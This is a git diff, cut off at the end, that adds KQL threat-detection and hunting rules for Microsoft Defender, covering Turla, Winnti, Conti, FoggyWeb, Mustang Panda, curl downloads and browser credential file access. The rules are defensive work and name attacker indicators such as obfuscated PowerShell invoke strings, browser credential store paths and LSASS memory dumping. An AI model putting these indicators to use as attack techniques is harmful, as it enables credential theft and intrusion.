/dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql @@ -0,0 +1,10 @@ +// Title: Turla Group Commands May 2020 +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-26 +// Level: critical +// Description: Detects commands used by Turla group as reported by ESET in May 2020 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql new file mode 100644 index 00000000..996d9685 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql @@ -0,0 +1,12 @@ +// Title: Winnti Malware HK University Campaign +// Author: Florian Roth (Nextron Systems), Markus Neis +// Date: 2020-02-01 +// Level: critical +// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql new file mode 100644 index 00000000..2f7b9965 --- /dev/null +++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql @@ -0,0 +1,12 @@ +// Title: Winnti Pipemon Characteristics +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2020-07-30 +// Level: critical +// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Legitimate setups that use similar flags + +DeviceProcessEvents +| where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql new file mode 100644 index 00000000..213e1824 --- /dev/null +++ b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql @@ -0,0 +1,10 @@ +// Title: Conti Volume Shadow Listing +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command used by conti to find volume shadow backups +// MITRE Tactic: Resource Development +// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql new file mode 100644 index 00000000..06914cb0 --- /dev/null +++ b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql @@ -0,0 +1,12 @@ +// Title: FoggyWeb Backdoor DLL Loading +// Author: Florian Roth (Nextron Systems) +// Date: 2021-09-27 +// Level: critical +// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath =~ "C:\\Windows\\ADFS\\version.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql new file mode 100644 index 00000000..4d0dd96b --- /dev/null +++ b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql @@ -0,0 +1,10 @@ +// Title: Formbook Process Creation +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-09-30 +// Level: high +// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql new file mode 100644 index 00000000..c34e093f --- /dev/null +++ b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql @@ -0,0 +1,12 @@ +// Title: Mustang Panda Dropper +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2019-10-30 +// Level: high +// Description: Detects specific process parameters as used by Mustang Panda droppers +// MITRE Tactic: Resource Development +// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql new file mode 100644 index 00000000..4a9cea7b --- /dev/null +++ b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Word Cab File Write CVE-2021-40444 +// Author: Florian Roth (Nextron Systems), Sittikorn S +// Date: 2021-09-10 +// Level: high +// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587, detection.emerging-threats + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql new file mode 100644 index 00000000..19069e8a --- /dev/null +++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql @@ -0,0 +1,17 @@ +// Title: Clipboard Data Collection Via Pbpaste +// Author: Daniel Cortez +// Date: 2024-07-30 +// Level: medium +// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). +The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. +It can also be used in shell scripts that may require clipboard content as input. +Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. +Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. + +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/pbpaste" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql new file mode 100644 index 00000000..9d43295f --- /dev/null +++ b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql @@ -0,0 +1,12 @@ +// Title: Password Protected Compressed File Extraction Via 7Zip +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-10 +// Level: low +// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001, detection.threat-hunting +// False Positives: +// - Legitimate activity is expected since extracting files with a password can be common in some environment. + +DeviceProcessEvents +| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql new file mode 100644 index 00000000..c392e3c7 --- /dev/null +++ b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql @@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Compression Tool Parameters +// Author: Florian Roth (Nextron Systems), Samir Bousseaden +// Date: 2019-10-15 +// Level: medium +// Description: Detects potentially suspicious command line arguments of common data compression tools +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001, detection.threat-hunting + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql new file mode 100644 index 00000000..4c19b2cc --- /dev/null +++ b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql @@ -0,0 +1,12 @@ +// Title: System Drawing DLL Load +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: low +// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113, detection.threat-hunting +// False Positives: +// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness + +DeviceImageLoadEvents +| where FolderPath endswith "\\System.Drawing.ni.dll" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql new file mode 100644 index 00000000..6a609ab3 --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql @@ -0,0 +1,13 @@ +// Title: Curl.EXE Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: low +// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql new file mode 100644 index 00000000..2f6a2f58 --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql @@ -0,0 +1,13 @@ +// Title: Curl.EXE Execution With Custom UserAgent +// Author: frack113 +// Date: 2022-01-23 +// Level: medium +// Description: Detects execution of curl.exe with custom useragent options +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql new file mode 100644 index 00000000..6ba7d784 --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql @@ -0,0 +1,14 @@ +// Title: File Download Via Curl.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects file download using curl.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity +// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql new file mode 100644 index 00000000..9b144aaf --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql @@ -0,0 +1,15 @@ +// Title: Network Connection Initiated From Users\Public Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder. +Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. +Use this rule to hunt for potential suspicious or uncommon activity in your environement. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting +// False Positives: +// - Likely from legitimate third party application that execute from the "Public" directory. + +DeviceNetworkEvents +| where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql new file mode 100644 index 00000000..6c9bee4a --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql @@ -0,0 +1,15 @@ +// Title: Potentially Suspicious Azure Front Door Connection +// Author: Isaac Dunham +// Date: 2024-11-07 +// Level: medium +// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) +that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting +// False Positives: +// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2. +// - Organization-specific Azure Front Door endpoints + +DeviceNetworkEvents +| where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql new file mode 100644 index 00000000..a50c4793 --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql @@ -0,0 +1,28 @@ +// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions +// Author: @kostastsale +// Date: 2023-04-13 +// Level: medium +// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. + +Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. +Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. + +Hunting Opportunity 1- Weed Out The Noise + +When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": + +ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" + +After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. + +Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours + +If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting +// False Positives: +// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities. + +DeviceProcessEvents +| where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql new file mode 100644 index 00000000..68980619 --- /dev/null +++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql @@ -0,0 +1,13 @@ +// Title: VsCode Code Tunnel Execution File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, detection.threat-hunting +// False Positives: +// - Legitimate usage of VsCode tunneling functionality will also trigger this + +DeviceFileEvents +| where FolderPath endswith "\\code_tunnel.json" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql new file mode 100644 index 00000000..34fbdd94 --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql @@ -0,0 +1,18 @@ +// Title: Access To Browser Credential Files By Uncommon Applications +// Author: frack113, X__Junior (Nextron Systems) +// Date: 2022-04-09 +// Level: low +// Description: Detects file access requests to browser credential stores by uncommon processes. +Could indicate potential attempt of credential stealing. +Requires heavy baselining before usage + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents +| where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql new file mode 100644 index 00000000..e84184c5 --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql @@ -0,0 +1,17 @@ +// Title: Access To Chromium Browsers Sensitive Files By Uncommon Applications +// Author: X__Junior (Nextron Systems) +// Date: 2024-07-29 +// Level: low +// Description: Detects file access requests to chromium based browser sensitive files by uncommon processes. +Could indicate potential attempt of stealing sensitive information. + +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access, detection.threat-hunting +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents +| where (FileName contains "\\User Data\\Default\\Cookies" or FileName contains "\\User Data\\Default\\History" or FileName contains "\\User Data\\Default\\Network\\Cookies" or FileName contains "\\User Data\\Default\\Web Data") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql new file mode 100644 index 00000000..8ee6547c --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql @@ -0,0 +1,10 @@ +// Title: Access To Sysvol Policies Share By Uncommon Process +// Author: frack113 +// Date: 2023-12-21 +// Level: medium +// Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006, detection.threat-hunting + +DeviceFileEvents +| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and FileName startswith "\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql new file mode 100644 index 00000000..c1c3f7b3 --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql @@ -0,0 +1,16 @@ +// Title: Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process +// Author: Perez Diego (@darkquassar), oscd.community, Ecco +// Date: 2019-10-27 +// Level: medium +// Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. +The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. +As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. +Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. + +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, detection.threat-hunting +// False Positives: +// - Debugging scripts might leverage this DLL in order to dump process memory for further analysis. + +DeviceImageLoadEvents +| where ((FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll") and (InitiatingProcessFolderPath endswith "\\bash.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\dnx.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\monitoringhost.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\regsvcs.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\sc.exe" or InitiatingProcessFolderPath endswith "\\scriptrunner.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((((InitiatingProcessCommandLine endswith "-k LocalServiceNetworkRestricted" or InitiatingProcessCommandLine endswith "-k WerSvcGroup") and InitiatingProcessFolderPath endswith "\\svchost.exe") or ((InitiatingProcessCommandLine contains "/d srrstr.dll,ExecuteScheduledSPPCreation" or InitiatingProcessCommandLine contains "aepdu.dll,AePduRunUpdate" or InitiatingProcessCommandLine contains "shell32.dll,OpenAs_RunDL" or InitiatingProcessCommandLine contains "Windows.Storage.ApplicationData.dll,CleanupTemporaryState") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (InitiatingProcessCommandLine endswith "\\TiWorker.exe -Embedding" and InitiatingProcessCommandLine startswith "C:\\WINDOWS\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql new file mode 100644 index 00000000..f3c4df7a --- /dev/null +++ b/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql @@ -0,0 +1,13 @@ +// Title: EventLog Query Requests By Builtin Utilities +// Author: Ali Alwashali, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-20 +// Level: medium +// Description: Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. + +// MITRE Tactic: Credential Access +// Tags: attack.t1552, attack.credential-access, detection.threat-hunting +// False Positives: +// 